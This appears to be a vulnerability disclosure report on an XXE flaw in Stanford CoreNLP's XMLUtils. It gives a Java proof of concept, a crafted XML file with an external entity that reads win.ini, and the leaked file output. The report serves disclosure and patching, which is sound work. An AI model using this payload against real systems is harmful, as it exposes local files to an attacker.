Improper Restriction of XML External Entity Reference in stanfordnlp/corenlp
Valid
Reported on
Sep 29th 2021
✍️ Description
The Stanford CoreNLP package provides a set of natural language analysis tools written in Java, is using a vulnerable XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the getTextContentFromTagsFromFile() function in the "XMLUtils.java" file may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.
🕵️♂️ Proof of Concept
package xxe_poc;
import java.io.File;
import java.util.List;
import edu.stanford.nlp.util.XMLUtils;
public class Poc {
public static void main(String[] args) {
File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample.xml");
List<String> returnLlist = XMLUtils.getTextContentFromTagsFromFile(file, "lastName");
System.out.print(returnLlist);
}
}
sample.xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
Check the Output:
[; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
]
We created a
GitHub Issue
asking the maintainers to create a
SECURITY.md
2 years ago
@maintainer Please find the patch at https://github.com/srikanthprathi/CoreNLP/pulls
Srikanth Prathi modified the report
2 years ago
Srikanth Prathi modified the report
2 years ago
2 years ago
We have contacted a member of the
stanfordnlp/corenlp
team and are waiting to hear back
2 years ago
to join this conversation
